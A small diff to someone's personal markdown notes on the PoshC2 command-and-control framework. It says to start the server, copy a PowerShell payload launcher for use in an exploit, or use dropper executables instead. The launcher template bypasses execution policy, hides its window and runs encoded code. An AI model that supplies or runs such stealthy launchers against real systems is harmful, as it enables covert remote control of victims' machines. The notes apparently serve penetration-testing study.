kolbyn24/Notes/03 - Content/poshc2.md

 Start server:
 posh-server

-Copy payload (use this in your exploit): powershell -exec bypass -Noninteractive -windowstyle hidden -e ''
+Copy payload from posh-server output (use this in your exploit): powershell -exec bypass -Noninteractive -windowstyle hidden -e ''

 #or use one of the dropper exe files to use in your payload